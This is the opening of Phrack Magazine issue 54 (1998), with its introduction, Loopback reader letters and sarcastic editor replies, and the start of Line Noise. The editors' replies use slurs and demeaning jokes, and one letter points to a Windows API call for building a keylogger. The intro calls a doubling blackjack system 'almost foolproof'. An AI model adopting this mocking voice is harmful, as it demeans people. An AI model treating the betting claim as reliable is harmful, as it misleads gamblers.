---[ Phrack Magazine Volume 8, Issue 54 Dec 25th, 1998, article 01 of 12
-------------------------[ P H R A C K 5 4 I N D E X
--------[ Living in SYN
Things that we want for Christmas: Functional remote operating system
detection. Functional remote promiscuous mode detection. Functional agent
based intrusion detection.
A note about this issue. Loyal and perceptive readers will notice this issue
is a bit smaller. There are two reasons for this. The first is swift
delivery. We are attempting to make Phrack issues a bit more svelte in
order to pump them out on a more timely basis. The other reason is quality.
There is enough garbage out there. We turn down at least half of all
submissions to bring you the good stuff. Enjoy.
Rewind to August 1998.
It's Sunday morning in Las Vegas, about 5:00am-ish. Angstrom and I decide
to leave the Hard Rock Hotel. It's been a long night of drinking and
gambling. I am up maybe $200. He's up about $30. We're both inebriated
beyond repair. We return to Jackie Gaughan's Plaza Hotel and Casino, a
wretched place where the old go to get older and everyone's got at least one
foot in the grave. Back to the Future II? Biff's Pleasure Palace? Welcome
to the Plaza Hotel.
Anyhow, we saunter on in, make our way over to the lounge and find Artimage,
Asriel, Glyph, and Alhambra.* After some random dialogue (the specifics of
which I have completely forgotten) Asriel tells me I should play some more
Blackjack.
"I only have hundreds." was my reply. I didn't want to play anymore
anyhow. This was the 6th day of my Vegas stint and I was burnt on
gambling.
"<shrug> Bet a hundred then." says As.
"<shrug> Ok." I caved.
I plop down on an unoccupied blackjack table and plunk my hundred down. The
dealer was a gentle looking 200-year-old man from Laos.
"MONEY PLAYZ!" I say. I remember being very drunk.
"Money plays?" He questions? The pit boss wakes up.
"Money plays." I confirm
"Money plays!" He announces to the pit boss. The pit boss scribbles in his
book.
Here's where the details get fuzzy. I can't remember the hand I was dealt, nor
any subsequent cards. All I know is I played textbook blackjack. That's all
you need to know here. I played according to the `book`. I lost that hundred.
At that point, my blackjack betting system kicked in. I lay down 2 more
bills.
"Money playz." I repeat.
"Money plays!" He announces to the pit boss. The pit boss scribbles
something else in his little book.
My system is simple and almost foolproof. Bet small when you are just fucking
around. Bet big when you want to win big. Lose a big hand? Double your bet.
Lose again? Double it again. Lose again? Goto 1. The odds in blackjack
tend to hover around .05% house favor (this can vary widely depending on
several factors including the type of blackjack, the number of decks, the
skill of the player, whether or not the player counts cards, the card counting
scheme used, etc**). Eventually, odds are, you will win all your money back,
AND THEN SOME!*** Of course, this relies on both your bankroll and the table
maximum being unlimited. Small details I usually overlook.
So I lose the 2 hundred.
THE SYSTEM IS STILL IN FULL EFFECT. I plunk down another 4 small.
"Money plays?" The dealer muses. I nod.
"Money plays." The pit boss scribbles.
I lose another hand. Bye-bye 4 hundred.
Asriel is laughing at this point.
"Dude, I think you should quit now." He offers.
"Nah. I'm not done yet."
Hrm. Time to gather my thoughts. No more namby-pamby. Time to separate
the armchair gamblers from the hard-core haggard idiot types who end up having
to live in Vegas. I peel off 10 hundreds. 1 large is placed in that little
betting circle thingy.
"Money plays." The pit boss scribbles, Onlookers gawk, I pray.
Now this hand I remember distinctly. First card: an 8. Hrm. Second card: a
6. Ugh. Dealer shows an 8. FUCK. Oh. Good. Well, that's $1700 well spent
in about 2 minutes. Well. I had to hit. I get a 6. Wow. WOW! Dealer
flips his hold card. A 10.
"HAHAHAHHAHAHAHAHAHA" I proclaim.
"10 blacks out" The dealer shouts. The pit boss stops writing.
"Want to be rated?" He asks.
"Nope! Bye!" And off I went to cash out.
* Actually, playing basic strategy alone can sometimes give you pretty
close to even odds (or even better than even). Usually, however, you will
find that you will need to count cards in addition to basic strategy to have a
real advantage.
** Assoc. Editor's note: If you take this advice, chances are you'll be
a very upset and angry gambler come next Defcon. Whine to route when you
can't afford a hotel room, not me. Maybe he'll let you sleep on his floor.
A special shout-out to Ron Rivest. It has worked its way down the grapevine
that he reads Phrack. Add one more to the Super Elite People That Read Phrack
(SEPTREP) list. If you are or know one of these people, please send email to
the editor to be added to the list (See linenoise for the list).
A word of caution about P54-06 and P54-10: If you attempt to apply the kernel
patches for these articles in succession on the same system, the second one
will fail at the syscalls.master file. You will need to patch this by hand.
It's not hard. Go ahead and try it. I trust you.
Enjoy the magazine. It is by and for the hacking community. Period.
-- Editor in Chief ----------------[ route
-- Associate Editor ---------------[ alhambra
-- Phrack World News --------------[ disorder
-- Phrack Publicity ---------------[ dangergirl
-- Phrack Webpage Guy -------------[ X
-- Phrack Typographical fixer -----[ silitek
-- Phrack Special Consultant ------[ redragon
-- Mad Cow disease ----------------[ sir dystic and dildog
-------- Elite --------------------> daveg
-- Official Phrack/r00t auto ------[ BMW M3
-- Your trusted security advisors -[ p and sw_r
-- Shout Outs and Thank Yous ------[ kamee, vision, artimage, chris, meenk,
-----------------------------------| the former SNI team, n8, phundie, par,
-----------------------------------| radium, k0re, horizon, dhg, mds, mudge,
-----------------------------------| bioh, pm (for the elite dox)
Phrack Magazine V. 8, #54, Dec 25th, 1998. ISSN 1068-1035
Contents Copyright (c) 1998 Phrack Magazine. All Rights Reserved. Nothing
may be reproduced in whole or in part without written permission from the
editor in chief. Phrack Magazine is made available quarterly to the public,
free of charge. Go nuts people.
Contact Phrack Magazine
-----------------------
Submissions: phrackedit@phrack.com
Commentary: loopback@phrack.com
Editor in Chief: route@phrack.com
Associate Editor: alhambra@phrack.com
Publicist: dangergrl@phrack.com
Phrack World News: disorder@phrack.com
Submissions to the above email address may be encrypted with the following key:
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2
mQENAzMgU6YAAAEH/1/Kc1KrcUIyL5RBEVeD82JM9skWn60HBzy25FvR6QRYF8uW
ibPDuf3ecgGezQHM0/bDuQfxeOXDihqXQNZzXf02RuS/Au0yiILKqGGfqxxP88/O
vgEDrxu4vKpHBMYTE/Gh6u8QtcqfPYkrfFzJADzPEnPI7zw7ACAnXM5F+8+elt2j
0njg68iA8ms7W5f0AOcRXEXfCznxVTk470JAIsx76+2aPs9mpIFOB2f8u7xPKg+W
DDJ2wTS1vXzPsmsGJt1UypmitKBQYvJrrsLtTQ9FRavflvCpCWKiwCGIngIKt3yG
/v/uQb3qagZ3kiYr3nUJ+ULklSwej+lrReIdqYEABRG0GjxwaHJhY2tlZGl0QGlu
Zm9uZXh1cy5jb20+tA9QaHJhY2sgTWFnYXppbmU=
=1iyt
-----END PGP PUBLIC KEY BLOCK-----
As always, ENCRYPTED SUBSCRIPTION REQUESTS WILL BE IGNORED. Phrack goes out
plaintext. You certainly can subscribe in plaintext.
phrack:~# head -20 /usr/include/std-disclaimer.h
/*
* All information in Phrack Magazine is, to the best of the ability of the
* editors and contributors, truthful and accurate. When possible, all facts
* are checked, all code is compiled. However, we are not omniscient (hell,
* we don't even get paid). It is entirely possible something contained
* within this publication is incorrect in some way. If this is the case,
* please drop us some email so that we can correct it in a future issue.
*
*
* Also, keep in mind that Phrack Magazine accepts no responsibility for the
* entirely stupid (or illegal) things people may do with the information
* contained herein. Phrack is a compendium of knowledge, wisdom, wit, and
* sass. We neither advocate, condone nor participate in any sort of illicit
* behavior. But we will sit back and watch.
*
*
* Lastly, it bears mentioning that the opinions that may be expressed in the
* articles of Phrack Magazine are intellectual property of their authors.
* These opinions do not necessarily represent those of the Phrack Staff.
*/
-------------------------[ T A B L E   O F   C O N T E N T S
 1 Introduction                                        Phrack Staff     22K
 2 Phrack Loopback                                     Phrack Staff     58K
 3 Phrack Line Noise                                   various          90K
 4 Phrack Prophile on the parmaster                    Phrack Staff     26K
 5 Linux and Random Source Bleaching                   phunda mental   174K
 6 Hardening OpenBSD for Multiuser Environments        route            90K
 7 Scavenging Connections On Dynamic-IP Networks       Seth McGann      34K
 8 NT Web Technology Vulnerabilities                   rfp              40K
 9 Remote OS detection via TCP/IP Stack Fingerprinting Fyodor           58K
10 Defeating Sniffers and Intrusion Detection Systems  horizon         100K
11 Phrack World News                                   Disorder        240K
12 extract.c                                           Phrack Staff     32K
                                                                       966K
-----------------------------------------------------------------------------
"...a bellvue in the mental hospital world of media whore web pages..."
- xanax on #phrack, 10-13-1998, when asked to comment on Antionline.
"This is not a tool we should take seriously, or our customers should take
seriously..."
- Edmund Muth, Microsoft, as reported by the New York Times,
referring to Back Orifice. (How many thousands of machines were
owned with BO?)
*deraadt* your style is so unlike anyone else's, that it makes no sense that
you have this "style"
- Theo de Raadt, OpenBSD project leader, referring to route's code in
this issue.
"So I thought of something useful I could do with the money. I bought
a Nintendo 64 for one of my sisters, who has a slight mental retardation.
The reason for this was because the doctors have always told us that
things to stimulate her hand eye coordination would help her."
- Chameleon of the `masters of downloading` "hacking group",
commenting on why he didn't spend money on medical care for his
sister.
-----------------------------------------------------------------------------
----[ EOF
---[ Phrack Magazine Volume 8, Issue 54 Dec 25th, 1998, article 02 of 12
-------------------------[ P H R A C K 54 L O O P B A C K
--------[ Phrack Staff
Phrack Loopback is your chance to write to the Phrack staff with your
comments, questions, or whatever. The responses are generally written by
the editor, except where noted. The actual letters are perhaps edited
for format, but generally not for grammar and/or spelling. We try not to
correct the vernacular, as it often adds a colorful perspective to the
letter in question.
0x1>--------------------------------------------------------------------------
My boyfriend turned homself into a transexual and dumped me for another
guy.What could you do to help me (please)show him how much I appreciate him?
Or,what should I do?THIS letter is no prank.This truly happened and I was
hoping for some advice from you so PLEASE don't blow up my
computer.Sincerely,B.C.
[ I swear to god this is an actual letter. I can't make this stuff up
(no sarcastic commentary needed here). ]
0x2>--------------------------------------------------------------------------
An interesting zine you have, but I have to say my favourite part is
the loopback section. The writing in the letters is passing at best,
while the satirical commentary is absolutely first rate. I just read
loopback from #53 and I just kept laughing. Way to go. Hey, as I
say, don't take life seriously, it doesn't take you seriously.
[ Thank you. We aim to please. ]
0x3>--------------------------------------------------------------------------
What is the system a school uses called? PBX? How can I hack the system
and what type of priveleges can I gain?
LocoJ
[ You can listen to the school officials talking about how much of a
retard they think you are and how they are going to hold you back another
year. ]
0x4>--------------------------------------------------------------------------
Have you ever wandered how people called hackers keep on annoying government
agencies and major corporations?
[ I often find myself wandering that very thing. ]
Most secure government information is not a secret to these people, no
protection guarantees safety against their breaking in.
[ No one can eat just one! ]
Some people may think that in order to be a hacker one must be extraordinary
smart, use expensive equipment and have contacts with the underground world.
[ That's about the size of it. And we all have sex with models. That's
key. ]
This is not true. Recent studies show that a computer user is at least
twenty percent smarter than an average person.
[ Uh. Yah. That's a great statistic. Who doesn't use a computer
these days? The only people not using computers are either mumbling
retards or are hooked up to computers to live. ]
If you are reading this you are smart enough.
[ However, if you are *writing* it, evidently, you're not. ]
All the equipment you need is your computer and modem. And try to avoid
contacts with the underground world - they are trouble.
[ Indeed. Stay away from the people who really know what they are doing.
Be sure to blanket yourself with blissful ignorance. Live a sheltered
life alone. Stay away from people. They will only hurt you with
words. ]
All you really need is information.
[ "..which you won't get here!" ]
For the first time information kept secret both by government and hackers is
available to public. Our informational report contains everything you need to
know about hacking including: *"Hackers 101" - the ultimate and comprehensive
step by step guide to how it's done. This incredible guide written by an
accomplished hacker especially for beginners will answer following questions:
[ Accomplished at bathing himself and being able to tie his left shoelace
and most of the right one. ]
-What should you know about hacking and where to start?
[ Start at your local brothel! ]
-Programs needed.
-List of access numbers.
[ How about a list explaining what these numbers are supposed to access. ]
-How keep yourself safe.
-Cracking programs, what they do and how they work.
-UNIX, an easy approach.
-Password shadowing.
-Dialouts.
-Scanners.
-Brute force hacking.
..and much more.
[ -programing for the ultimate idiot
-hookers and pimps: a two day tutorial
-circus animal social engineering
-building chicken flavored air conditioners ]
Hacker resources on the Internet: The most complete collection of real life
hackers websites where you can find:
-programs
-tools
-scripts
-most recent know-how and techniques
-news from the world of hacking
[ NEWSFLASH: YOU SUCK ]
-tones of other useful information.
You can receive our report as a printed material (only $9), on a floppy in
.txt format (only $7) or by email in *.txt format/ZIP file (only $7).
[ And you can receive a thump on the head from the Phrack staff if you
actually send these precious retards any money. ]
For domestic orders S&H is $1. For orders from Alaska, Hawaii and foreign
countries please add $5 for S&H. For email orders S&H does not apply. Order
now and as a free bonus you will receive a guide to Internet sites with
thousands of totally free software titles (limited time only). Send cash,
check or money order to:
TWS, PO Box 1357 Rancho
Cordova, CA 95741.
For check orders please allow one week for clearance.
[ ...so i can ask my mom to cash it for me... ]
Disclaimer:
Please keep in mind that any information we provide is for educational
purposes only.
[ Educational? Try mildly recreational at best. ]
TWS is not responsible for any actions of its clients.
[ ...because we have no clients... ]
0x5>--------------------------------------------------------------------------
Before I start, if this is the wrong address I should be grovelling to
then I apologize profusely.
[ It's probably not the wrong address, but I accept your apology for
what will probably be an inane question. ]
I'm relatively new to the entire computer world. I mean I've had a
computer for a number of years and the internet for about 15 months but
I feel that I don't know enough.
[ As if one can ever feel that she `knows enough`. ]
I'm BORED with what I can do and I was wondering if you could tell me or
[ Bored with nothing I can understand. ]
perhaps face me in the direction I need to go to learn how to hack. The
very basics. The amoeba level of hacking if you will.
[ Ok. Start small. Start with hacking napkins and forks and spoons,
then slowly move onto more complex devices like drawers and scissors.
Someday you can move on to wall clocks and `the clapper`. You'll
get there eventually. ]
Ever since I've been online I've always wanted to know how to hack. You
see the articles on captured hackers and the news on firms trying to boost
online security and it makes you want to go out there do stuff.
So if you've got the
[ "Do stuff"? Well. You've certainly got the right mentality. Hey,
maybe sometime I can come over to your house and we can watch T.V. or
listen to CDs or something. ]
time, it would really be appreciated.
Much appreciated,
-Dallor
0x6>--------------------------------------------------------------------------
do you have a chat room? i was told you could teach me some stuff about
computers.i am very new to the computer world @ my old age.i mess my system
at every 2weeks do to the fact i dont know what to do!
[ I suggest you look into other hobbies. Maybe nursery rhyming? ]
- naynay
[ Sha-naynay! ]
0x7>--------------------------------------------------------------------------
Hello, just wanted to congratulate you guys for an excellent
magazine and keep up the hard work. Also I have noticed that
ppl can ask for things. So could I please have a two storey
mansion, Porsche, Harley Davidson, yacht, five million dollars,
seven beautiful girls (one for each night), ..................
.............................................. thank you :-))
cheers Rundus
[ You are a shallow materialistic person Rundus. People all over the
world are suffering from famine and disease. Maybe you should give
some thought to them. ]
0x8>--------------------------------------------------------------------------
[ P53-02@0x12: ... I would like to know more about marshmellows... ]
Well, since Phrack has gifted me with so much knowledge, it's time for me
to start giving back!
[ NIGH time if you ask me... ]
Marshmellows date back to Ancient Egypt where the ancients took the roots
from a mallow plant/tree and made it into a sticky paste. From there it
was cooked to form a puffy yellowish treat for the Pharoahs and such. The
mallow "treat" became popular in the 30's as a confectionary treat. However,
due to the long process of making these treats, they did not reach the
popularity of today until Marshmellow making was revolutionized in the 60's.
The "jet-puffed" method was introduced. The sticky base material was mixed
with sugars and other additives and puffed using a airation type machine.
The marshmellow comes out of the machine in long tubes and is cut to form
the shape of what we know as marshmellows today.
For the history of corn flakes, SPAM, or Jello, please contact your
neighborhood loser.
[ Hrm. I suppose you think marshmellows are in the upper echelon of
confectioneries? WHAT GIVES YOU THE RIGHT? ]
My thirst for knowledge is not limited to computer systems. Sadly..
Ray K.
[ Tune in next issue when Ray gives a dissertation on Peter Scolari's
career in the television industry entitled: "From Bosom Buddy to
Honey I'm Drunk Again and Out of Work"... ]
0x9>--------------------------------------------------------------------------
Hey!
I was wondering if you could help me to find some things?
[ Sorry bro. I don't know where your family is. I think they've ditched
you. I say pick up and move on. ]
Well I'm in to games. And I know that x-files have got a game with the
same name. Do you know where I can find it so that I can download the
game on my computer???
[ Hrm. Try Best Buy or maybe Babbages. ]
And do you know some good sites where you can find ONLY mp3s???
Thanks for your time
Cybers
[ What an excellent and unique nickname! ]
0xa>--------------------------------------------------------------------------
Pretty clever.........I saw the web page on the tv........PHRACK......bein'
where you come from wasn't hard to find this page.......
[ Uh. Rite. ]
Just thought it was hilarious and totally in the right to show that not
everyone is as safe as they would like to think..... A SUPPORTER of your
beliefs I am......
[ Cool. We need more zealots for our secret army. ]
Thanks fer showin hacks still live a breath beneath everyone else........
[ Huh? ]
after all it's only wrong if you get caught......consequences dictate the
course of ACTION...(REV. JAMES KEENAN MAYNARD,tool)
[ Well, actually, getting caught is independent of equity. And letting
consequences dictate the course of action seems rather backward and
after-the-fact-ish. ]
Bit-Basher......
0xb>--------------------------------------------------------------------------
Just thought I would write in to voice my concern about a growing problem
in our community: Lamers and Idiots.
Alot of the time people ask me what makes up a lamer.
[ Perhaps they are asking you because you fit the mold so nicely. ]
IN my opinion, if you are 2 or more of these, you are a lamer/idiot.
[ In my opinion, you are an idiot if you make lists about what comprises
idiocy. ]
1- unnecessarily ask for information that any damned idiot could find in
10 minutes on a search engine
[ Somehow I doubt people of any level of intelligence come to you for
answers. Idiots can smell each other out pretty well. ]
2- Talk in leet-speek ("haY d00dZ Eye'm uhn 3l33t hax0r, g1v3 m3 p455w0rd5!")
and expect everyone to give you the slightest sliver of respect
[ Please don't ever email me or Phrack Magazine again. I don't care
how much of a good idea it seems, don't do it. The heat death of the
universe had better happen before I hear from you again. ]
3- Shoot your mouth off about stuff you know NOTHING about
[ Or in your case, ANYTHING. ]
4- Claim to run or own high sites (ArchAngel claiming to own the L0pht is an
excellent example).
[ Who the hell is that? ]
5- Ask for exact instructions on how to hack a site
[ A little game I like to play when I'm bored is `find the moron`. Woop!
There you are! ]
There's more criteria, I'm sure, but I just can't think of it.
[ BUT HOW WILL THE IDIOTS AMONG US COPE!@? ]
Newbies constantly ask to be taught.As for the newbies out there -
who are on the verge of becoming lamers - I think the best advice we can
[ Oh. No. Nono. Don't do that. Please. `We`. Do not refer to us as
peers. ]
give them is that hacking is not a "teachable" skill. It's something that
has to be learned through experience - you have to know how things work,
how things interact, and that invlves educating yourself. Never rely on
someone else to give you acurate information - always look for the facts.
[ Good plan. Never attempt to learn from anyone. Be your own mentor.
School yourself in ignorance. ]
Well, I'm not really sure what that rant was about but thanks for
listening to it..
[ Well if you don't then I sure as hell have *no* fucking idea. ]
{BTW Phrack 53 was great. Keep it up.}
[ Hey Thanks! Always nice to hear when we're doing a good job! ]
0xc>--------------------------------------------------------------------------
Hey, i'm new at this. how do i get started? see i want to find out some
yahoo codes. is there anything i should know? i don't have a clue what
is legal and what is not...
[ Ok. That's simple. `Cyberspace` is kinda like the Old West. There's
one guy who hangs out and deters criminals with his magic busket of
moral redemption. Any wrong-doer who comes in contact with it instantly
regrets his sin and is then forgiven. The busket is faulty though and
sometimes (about 30% of the time) the person just explodes. However,
scientists and alchemists from Brown University are working on a magic
pill that will prevent this occasional exploding. It doesn't so much
*prevent* the exploding though, as much as it pieces the person back
together *after* the explosion. The rub is that you have to take the
pill prior to explosion. And no one wants to take the pill because it's
like a red flag to the authorities that you are a wrongdoer.
Oh wait, maybe that was a dream I had. ]
form Bisker
[ Shape-of... a spider monkey! Form-of... a bisker! ]
0xd>--------------------------------------------------------------------------
I need help I know you must be thinking that I am some lamer with AOL and
Windows who will never in his life become a hacker.
[ I kinda just had you pegged as someone who is scared of punctuation. ]
Well, most of that is true but I (Hopefully in time) will become a hacer.
[ Godspeed. ]
I need to know how do I protect my computer from other hackers?
[ Ok, I'll give you an insider tip. Here's what we do to keep our
computers safe from electronic ruffians: we use them once, then throw
them away. ]
Are there any .txt documents that you think I should read?
[ Check out the one entitled `My Two Mommies`. It answered _a lot_ of
questions for me. ]
I need all I can get on this topic so i can finally move on to the next step
(I don't know what that is yet my friend is helping me become a hacker).
[ Did he read "My Two Mommies"? If not, he's a charlatan. He's probably
just telling what you want to hear so you'll sleep with him. I'd shank
him once in the leg to be safe. ]
I don't care how many things I have to read just as long as I can become a
hacker.
[ Just think! If you're reading this, you're *that* much closer! ]
P.S. I had no clue who to send this to so I picked you (Doesn't that make you
feel special?). Also please don't make this public I went to some websites and
found Hackers love making fun of lamers and posting the mail they get on there
sites so I have this feeling that your going to post this letter somewhere.
Just don't please.
[ Not a problem. I'll keep this to private email. ]
0xe>--------------------------------------------------------------------------
Just browsed yr web page... you are an interesting person.
[ Agreed. ]
I 'd love to come to your r00t party (honest); may I?
[ Absolutely not. ]
I leave in greece and I am planing to travel to the u.s. this xmas.
[ That's nice. ]
It would be a grate opertunity for me to meet you and your friends.
[ Yes, but it's just as good an opportunity for you not to meet us. ]
PS: I am not a hacker, I just admire your work.
[ Well, thank you very much. That's good to hear. ]
liquid, Wed Sep 16 06:24:09 1998
0xf>--------------------------------------------------------------------------
hi todos
[ Who? ]
i was just reading some files about hacking and phreaking by french writters
than one or two suggestions came to my mind
(i) stop writing like a pre-pubescent boy with lot of ***eZ and B1abL4(blabla)
[ YAH! YOU DAMN FRENCH COMMIE NAZI BASTARDS! ]
(ii)be more explicit and professional like in PHRACK
[ YAY AMERICA! ]
so i hope that i have rung the bell to the wrong door, and that the french
scene does not look like that.
[ Huh? ]
another thing: does hack include studying and find flaws in religious system ?
[ Shure, why not? ]
because in fact religious system are formal system based and we can always find
paradox (godel's theorem) if yes i would have a futur paper for phrack
[ Alright. ]
i have an os name for mythrandir 'TRYOS' it's very short and really summerises
his work
THANK FOR ALL YOU DO FOR THE HACKER COMMUNITY
PHRACK IS THE BEST THING I HAVE EVER READ
[ WELL GOOD. IT'S THE BEST THING I HAVE EVER WRITTEN. ]
TFAYD.
0x10>-------------------------------------------------------------------------
man just to let you know, this is some very "educational" info. can't
say that i learned a lot, but this info help me catch up the past five
years. been in the navy, man it sucked, but i want to commend y'all.
but it's like they say, smart enough to do it, then do it, but it's your
consequences. to all the "real" people out here in this beloved world,
too bad they don't know reality. anyways, this is dope, it is the
bomb.
[ Word `em up on the level. ]
--vadaka--
0x11>-------------------------------------------------------------------------
Hi. I am OmniLynx, and I'm thinking of starting a new Web-Zine for hackers.
[ Hey! Sounds like a great niche market! ]
In the true spirit of hacking, it will be free to anyone who wants it.
[ In the true spirit of martyrization and self-glorification. ]
Unfortunately, at this point it is still just a thought, because I do not
have enough sources to make it any good. I'd like to know if you would want
to become a source for my Web-Zine. All you have to do is scout out tips,
tricks, news stories, anecdotes, etc. for or about hackers.
[ Please, may I? Can I be your intern? I'll be your Jimmy Olsen!
Let me set aside my professional career, my personal life, and my ezine
with its 14+ year history and get _right_ on that. ]
Unfortunately, you can't be paid for this, because it is free, but you will
[ BAH! Who needs money? Your adulation is payment enough! ]
get your name published and, possibly, be able to express your thoughts in
a column.
[ SHUT UP! I would be able to write a column?!@ Wow! I need to break
out my `Sony's My First Zine Kit` and get started! ]
OmniLynx
[ Dude. That's ironic. I almost chose the nick `EverpresentBobcat`. ]
0x12>-------------------------------------------------------------------------
HI phrack,
I am just reading phrack #52 `phrack loopback'.
You are just making me to laugh to dead. Better than any joke mailing-list
[ HOLY SHIT! Dude, I don't want anyone to laugh to dead! If everyone
laughs to dead, how will I get any repeat business? ]
fred
0x13>-------------------------------------------------------------------------
Been fucking around on the internet for about 3 years. After I got over
the intial rush of "WOW, look at all this fuckin software!"
[ And porn. ]
(and concurrently dumping OS/2 and msdog for Linux), I started reading...and
reading....and reading...then I ran into Phrack. In a word - KICKASS!
[ Thankz Cartman. ]
I've been reading all of the issues the last couple of daze and I'm really
impressed with the overall feeling of it. It's great reading about past
'battles' with the telco and systems (Phiber Optik stuff comes mind), the
DETAILED instructions given about various terminals, and the schematics
and stuff. History, Software and Hardware.
[ Don't forget all the great articles about bombs! Smoke bombs, bolt
bombs, acetylene bombs, shell bombs... Ah yes, the mid-80's were a
tumultuous time when youth felt the need to blow things up. ]
Besides pussy and beer, I can think of no more interesting subjects.
[ Except perhaps degrading and objectifying women. ]
I applaud the way you've kept it going by passing it on. I applaud that
you've remained true the idea "All information is public information - and the
aquisition thereof". I applaud the fact that it has survived this long - for
free. Next to the kernel - PHRACK[0-5][1-9] just might be the most important
bits on my machine. Keep it up fuckers - cause sure as taxation without
representation, they are gonna try and stomp you (us).
[ (you). ]
p.s. pointers on to how to hack sendmail to totally rewrite the headers
and envelopes to reflect a completely bogus username/system (for
purposes of anonymity - such as email like this) would be
greatly appreciated. If the pointer is 'grep sendmail ./PHRACK*' then...
..<sheepish grin>....nevermind...
You fuckers rock.....
Deicide
[ I've decided you suck. ]
0x14>-------------------------------------------------------------------------
I can prog............If you tell me how to hack I'll send my best
progs.......
[ Oh, that sounds like a fair trade. ]
I am leada of Warco
[ I am Lothar of the Hill People. ]
0x15>-------------------------------------------------------------------------
Can you get me in touch with anyone in Chicago who can help me retrieve
deleted documents from my home computer?
Thank You
[ I think Emil is free. Give him a ring. ]
0x16>-------------------------------------------------------------------------
I WAS WONDERING IF YOU KNEW WHERE I COULD FIND OUT HOW TO CONNECT TO AND
HACK PEOPLE'S PERSONAL COMPUTERS, OR MAYBE YOU KNOW.
I'D APPRECIATE SOME ADVICE,
[ Don't breed. ]
X-3
0x17>-------------------------------------------------------------------------
I need an infectious virus to corrupt a small network.
If you have any idea where I could get one, send me a line.
[ I need love and understanding. I'll trade you. ]
0x18>-------------------------------------------------------------------------
Hey...I'm not into hacking or anything, but I read an article about you and
Phrack in the Worcester Telegram and Gazette this morning. I just wanted to
tell you that I feel you're not bending to government pressure and everything is
very kool. This isn't about anarchy, it's about rights; freedom of the press.
Ya know? Anyhow, I will not take up anymore of your time. Remember, hackers
have rights too.
[ Some of us have mean leftz too. ]
0x19>-------------------------------------------------------------------------
It would be nice to be able to contact someone to do some hacking for you
in a specific manner.
[ Sorry. We only hack in a vague, nebulous manner. ]
Do you have any listings for this type of individual?
[ Try http://www.fbi.gov/fugitive/fpphome.htm. We usually recruit from
there. ]
0x1a>-------------------------------------------------------------------------
Hi there!
First off, just let me say how incredibly awesome and all powerful
Phrack is, especially issue 52.
[ A SUPREMELY POWERFUL JUGGERNAUT OF EFFICACIOUS POWER! ]
You have an amazing 'zine here, and I bow before you and worship the ground
you walk on. In fact, I think world domination is now in your grasp.
[ Shure, if all the world was as obsequious as you, we'd be set. ]
< Yes, I'm hitting on you :P >
[ Cool. Are you a hot chick? If not, back off fagbasket. ]
Really though, I'm just writing to thank you for Phrack Loopback.
[ A self-fulfilling prophecy. Here we are. ]
While everything in Phrack is good, and the majority is great (as rated on
[ How can everything be good, yet the majority be great? ]
the sliding scale of total goodness), the thing that gives me the most
spiritual fulfillment every issue is Loopback. It provides 78% of daily
allotted humor and 37% of the required sarcasm for mental well being.
[ And now you're a part of the love. *hug* ]
So, once more, thank you for the brilliant staff you have at
Phrack, and thanks as well to the people who write in!
[ KEEP THOSE LETTERS AND CARDS COMING! ]
Unit3
0x1b>-------------------------------------------------------------------------
Hello, I know I am going to sound very lame when I ask this. I would
really like it if you could give me a quick brief description on how to
hack into a system remotely. I can hack but I can't break into systems
without having a login and pw, well thnx ne ways
[ You suck. ]
0x1c>-------------------------------------------------------------------------
I don't really know who to contact about this. It's a compliment to all
of phrack magazine about the owning thing.
I am glad to see u guys take it well. I don't know if i would be able
to take it as well. But it is definitely respectful. I and many other
people already respected phrack magazine a lot.. but now I definitely
have a lot more respect for phrack.
[ Dude, you get any more respect for us and you'll officially qualify for
the `Phrack Magazine Hoover Super Suck-up Award`. It's a prestigious
award only given out to a select few. You're definitely in the
running. ]
SPy109
0x1d>-------------------------------------------------------------------------
sir
when I download an item from your page it's in X's O's and boxes.
[ Oh. You must have reached our tic-tac-toe server by mistake. Try
the URL again. ]
I tried ms/word, notepad, and no luck. Can you help? I'm also looking for an
article on how to go through the back door of AOL
[ I think there's one in the Virginia office, on the second floor. It's
Penski's office, and he never locks his door, that fucking moron. ]
from my office to my home over the Internet.
[ Oh. In that case, did you try wishing really, really hard? That
usually works for me. ]
so i could check on my spouse who i think is doing me wrong.
[ Oh, I can assure you, your spouse is up to no good. I think you should
definitely get a divorce and take the kids. ]
thanks
0x1e>-------------------------------------------------------------------------
[ P53-07: A Stealthy Windows Keylogger ]
Dearest Phrack,
I read "A Stealthy Windows Keylogger" in Phrack 53.7. Huh? Just
call SetWindowsHookEx(). It's built right into the operating system. It
lets you grab key strokes. It's simple. It even works on Windows NT.
There is no reason to go hooking interrupts or writing chunks of
inline assembly.
The documentation explains how SetWindowsHookEx() works. If that's still
not enough to go on, the Microsoft SDK ships with example programs that
grab key strokes.
- Iskra
0x1f>-------------------------------------------------------------------------
I see and hear all this about hackers; however, I never see and/or hear about
how it is done.
[ Like ninjas, true hackers are shrouded in secrecy and mystery. You may
never know -- UNTIL IT'S TOO LATE. ]
The reason I am asking is because of a soon-to-be-ex-wife who stole me cash I
[ Are you Irish? ]
operate my business with. I know she has placed the money in a bank somewhere
in my home town. Is there a way to find out which bank if I know she SSN?
[ I bet she's one of those fiery Irish lasses with flowing locks of red
hair and glittering green eyes. You think she'd go for me? How much
money she gank from you... Enough for her to run away and lavish me
with gifts? ]
------------------------------------------------------------------------------
----[ EOF
---[ Phrack Magazine Volume 8, Issue 54 Dec 25th, 1998, article 03 of 12
-------------------------[ P H R A C K 5 4 L I N E N O I S E
--------[ Various
0x1>-------------------------------------------------------------------------
The r00t/h4g1s peace summit - 1998
----------------------------------
In a digital world marred by strife and conflict, it was only fitting
that the two mega-super powers of the digital underground met for a peace
conference somewhere they could partake of the peace pipe. Amidst the
quaint silence of the fluttering windmills of Holland, the representatives
of their respective parties settled in for a week of negotiations in the
heart of Amsterdam.
Day 1:
They paint fake flies (the flying kind, not the zipper kind) on the
toilets in the Schlipteinheinekinoffien airport in Amsterdam, because,
as we all know, hackers can't resist a good target. The next stop was
to our official reception at the Hotel Ibis. I walked into the room,
meeting face to face with 7 of the most notorious and feared hackers
alive. My heart raced, and I felt all the sweat glands on my body release
in one giant orgasmic instant. And then I started coughing...
Day 2:
My throat severely scarred from the previous day of going to "coffee"
shops and buying (legally) some marijuana with such names as "The Elite
Buddha", and "Zero Day", we set out for some serious negotiations on the
second day. Our mission was to create a truce, allowing the free
transportation of our packets, unencumbered, unmodified, and unmonitored,
across the Internet. H4g1s demanded r00t supply them with "-1 Day" in
exchange for peace.
r00t requested a "-1 day" from an Internet savvy street person who kept
reminding us of our r00t brother, X. The street person, we'll call him
Outlaw, showed us some pills, but they did not appear to be what
h4g1s was looking for. So, we decided to move on. Outlaw, however, had
